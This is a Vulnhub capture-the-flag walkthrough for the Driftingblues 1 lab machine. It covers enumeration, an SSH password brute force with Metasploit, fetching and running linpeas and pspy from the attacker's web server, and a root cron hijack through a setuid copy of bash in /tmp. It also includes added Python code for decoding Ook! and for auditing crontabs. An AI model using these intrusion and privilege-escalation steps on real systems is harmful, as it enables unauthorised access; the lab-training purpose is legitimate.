Vulnhub – Driftingblues 1 – Walkthrough – Writeup

We are going to exploit the driftingblues1 machine from Vulnhub. Our goal is to capture the user and root flags. Also, make sure to check out the walkthroughs on the Harry Potter series.

Foothold

fping

fping -aqg 10.0.2.0/24

nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.9 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p$ports -sC -sV 10.0.2.9

gobuster dir

gobuster dir -u http://10.0.2.9 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

We have secret.html and index.html files. So, we can open them in browsers or use curl for the sake of saving time.

curl

curl http://10.0.2.9/index.html

There is an email address `sheryl@driftingblues.box`. So, we might speculate that there is a user sheryl and that the hostname of the server is driftingblues.box. We have to add that to the hosts file. Meanwhile, let’s gather some more information from the page.

echo L25vdGVmb3JraW5nZmlzaC50eHQ= | base64 -d 

Information gathered from the page:

  1. The hostname is driftingblues.box
  2. There are two users eric and sheryl.
  3. There is another path in the URL /noteforkingfish.txt.

Let’s check the path /secret.html.

curl http://10.0.2.9/secret.html

It just tells us to dig deeper. We will!

Add to hosts file

sudo vi /etc/hosts

Open /noteforkingfish.txt

curl http://driftingblues.box/noteforkingfish.txt

The file is full of “Ook” words with different punctuation. This is Ook!, an esoteric language in which each of Brainfuck’s eight instructions is written as a pair of Ook words, so the text is almost certainly an encoded message. We will search the internet for a decoder.

I used another website to decode the message. https://www.geocachingtoolbox.com/index.php
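To see what such a decoding site is doing under the hood, here is an added Python example (not code from the original post): it translates Ook! into Brainfuck and runs the result. The Ook! program it decodes is a constructed sample that prints "Hi"; the file served by the machine is not reproduced here.

```python
import re

# Ook! is Brainfuck with each of the eight instructions spelled as a pair
# of "Ook" words; only the punctuation carries information.
OOK_TO_BF = {
    ("Ook.", "Ook?"): ">", ("Ook?", "Ook."): "<",
    ("Ook.", "Ook."): "+", ("Ook!", "Ook!"): "-",
    ("Ook!", "Ook."): ".", ("Ook.", "Ook!"): ",",
    ("Ook!", "Ook?"): "[", ("Ook?", "Ook!"): "]",
}
BF_TO_OOK = {bf: ook for ook, bf in OOK_TO_BF.items()}


def ook_to_brainfuck(source):
    """Translate Ook! text to Brainfuck, ignoring anything that is not an Ook word."""
    tokens = re.findall(r"Ook[.?!]", source)
    if len(tokens) % 2:
        raise ValueError("odd number of Ook words: program is truncated or corrupt")
    return "".join(OOK_TO_BF[(tokens[i], tokens[i + 1])]
                   for i in range(0, len(tokens), 2))


def brainfuck_to_ook(program):
    """Inverse translation; used here only to construct the sample program."""
    return " ".join(" ".join(BF_TO_OOK[c]) for c in program if c in BF_TO_OOK)


def run_brainfuck(program, stdin=b"", max_steps=1_000_000, tape_size=30_000):
    """Execute a Brainfuck program and return whatever it prints, as text."""
    # Pre-compute matching brackets so loops are O(1) jumps.
    jumps, stack = {}, []
    for pos, ch in enumerate(program):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ] at offset {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched [ at offset {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = steps = 0
    out = bytearray()
    inp = iter(stdin)
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded: program may not terminate")
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF   # 8-bit cells wrap around
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)             # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        if not 0 <= ptr < tape_size:
            raise IndexError("tape pointer moved outside the tape")
        pc += 1
    return out.decode("latin-1")


def decode_ook(source):
    """Full pipeline: Ook! text in, printed message out."""
    return run_brainfuck(ook_to_brainfuck(source))


# Constructed sample: a Brainfuck program that prints "Hi", encoded as Ook!.
SAMPLE_BF = "++++++++[>+++++++++>+++++++++++++<<-]>.>+."
SAMPLE_OOK = brainfuck_to_ook(SAMPLE_BF)

if __name__ == "__main__":
    print(SAMPLE_OOK)
    print(decode_ook(SAMPLE_OOK))
```

Because only the punctuation is significant, `ook_to_brainfuck` tokenises with a regular expression and ignores whitespace and line breaks, which is what lets a copy-pasted file decode cleanly; the step limit guards against a malformed or hostile program that never terminates.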

The decoded message says we haven’t yet found the secret location, which appears to be a subdomain of driftingblues.box. We can enumerate virtual hosts using gobuster.

gobuster – vhost

gobuster vhost -u driftingblues.box --wordlist /usr/share/wordlists/dirb/common.txt

We found a vhost, test.driftingblues.box. Hence, we will also add this host to our hosts file.

sudo vi /etc/hosts

Now, we will curl to the newly found url.

curl http://test.driftingblues.box

Let’s enumerate this host using ZAP or nikto, whichever you feel comfortable with.

nikto -h http://test.driftingblues.box/

We saw that /ssh_cred.txt is giving us 200 OK status. Let’s visit that file from firefox.

Now, we know the format of the password. However, there is a digit at the end of it that we don’t know, so we have to brute-force it to get in. For this, we can create the wordlist with a short script (bash, Python, anything) or by hand, whichever is faster for you.

for i in {0..9}; do echo 1<snip>y${i};done | tee wordlist

Also, during our initial enumeration we found out that there are two users – eric and sheryl. Hence, we are going to brute-force the password for these users using the Metasploit framework.

msfconsole

msfconsole
use auxiliary/scanner/ssh/ssh_login
set username eric
set pass_file wordlist
set rhosts 10.0.2.9
set verbose true
run

We found out the password of user eric.

Privilege User – eric

Now, we can do ssh with the credentials.

ssh eric@10.0.2.9

Privilege Root

I will be using my two favourite tools, linpeas.sh and pspy, to enumerate further. linpeas.sh performs Linux privilege-escalation enumeration, whereas pspy snoops on running processes without needing root. To get them onto the target, start a web server on the local machine and serve the files from there.

On attacker (local) machine:

python -m http.server 8080

On target machine:

wget http://10.0.2.15:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee output
wget http://10.0.2.15:8080/pspy64
chmod +x pspy64

linpeas.sh reported a cron job. It also flagged the installed sudo version as possibly vulnerable.

pspy

./pspy64

Running pspy64 shows a backup script executing every minute, and that script in turn invokes another script from the /tmp directory.

Now, let’s examine the backup.sh script.

cat /var/backups/backup.sh

The backup.zip file which we saw earlier in the linpeas.sh output is produced by this script. The developer has also left a backdoor in it: the script executes /tmp/emergency, a path any user can write to. Since the cron job runs as root, it is now easy to get another shell, a reverse shell, an SSH entry, or even to change the root password; the possibilities are endless. All we have to do is write our own /tmp/emergency and make it executable.
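From the defender’s side, the weakness is a root cron job whose script hands control to a file in a world-writable directory. The following added Python example (not part of the original write-up) audits a system crontab for exactly that pattern. The crontab and the stand-in backup.sh it inspects are constructed samples modelled on the page’s description; the machine’s real files are not reproduced.

```python
import re

# Directories any local user can write to; a root job that executes
# something from here can be hijacked by whoever writes the file first.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Absolute paths in free text: a "/" not glued to a preceding word character.
ABS_PATH = re.compile(r"(?<![\w.\-])/(?:[\w.\-]+/)*[\w.\-]+")


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines (5 schedule fields, user, command).

    Comments, blank lines and VAR=value assignments are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if "=" in fields[0] or len(fields) < 7:
            continue
        jobs.append({"schedule": " ".join(fields[:5]),
                     "user": fields[5],
                     "command": fields[6]})
    return jobs


def untrusted_paths(text):
    """Absolute paths in text that live under a world-writable directory."""
    return sorted({p for p in ABS_PATH.findall(text) if p.startswith(WORLD_WRITABLE)})


def audit_crontab(crontab_text, read_file, users=("root",)):
    """Return (schedule, script-or-command, untrusted path) for privileged jobs.

    read_file(path) must return the script body or None; passing a dict's
    .get keeps the audit offline and testable."""
    findings = []
    for job in parse_system_crontab(crontab_text):
        if job["user"] not in users:
            continue
        # The command line itself may point straight at a world-writable path.
        for path in untrusted_paths(job["command"]):
            findings.append((job["schedule"], job["command"], path))
        # Follow every script the job runs and look inside it as well.
        for script in ABS_PATH.findall(job["command"]):
            body = read_file(script)
            if body is None:
                continue
            for path in untrusted_paths(body):
                findings.append((job["schedule"], script, path))
    return findings


# Constructed sample crontab, modelled on the job pspy revealed (every minute, as root).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
* * * * * root /var/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

# Constructed stand-in for backup.sh: it archives a directory, then runs a
# file from /tmp if one exists. The machine's actual script is not reproduced.
SAMPLE_FILES = {
    "/var/backups/backup.sh": """\
#!/bin/bash
zip -r /var/backups/backup.zip /var/www/html
if [ -x /tmp/emergency ]; then /tmp/emergency; fi
""",
}

if __name__ == "__main__":
    for schedule, where, path in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FILES.get):
        print(f"[{schedule}] {where} executes from a world-writable location: {path}")
```

On a live host, `read_file` would be a thin wrapper around `open`, and the same audit should be run over /etc/cron.d and each user’s crontab. A complementary check is to list setuid files under those directories (for example `find /tmp /var/tmp /dev/shm -perm -4000`), which would catch the root-owned copy of bash this write-up plants in /tmp.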

Add a custom bash

nano /tmp/emergency
chmod +x /tmp/emergency

Contents of /tmp/emergency:

#!/bin/bash

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

The above line copies the bash binary and sets the setuid bit on the copy. When root’s cron job executes our script, /tmp/bash becomes a root-owned setuid binary. Running it with the -p flag tells bash to keep the effective user id rather than dropping privileges, so we can impersonate root.

./pspy64

Now, we can try to impersonate the root user.

/tmp/bash -p

We got the root access.

cat /root/root.txt

We got the root flag.

Conclusion

I learnt about Ook! encoding from this machine. Other than that, we got to use gobuster’s vhost enumeration. The machine was labelled as easy, and it was. I will do driftingblues2 soon.
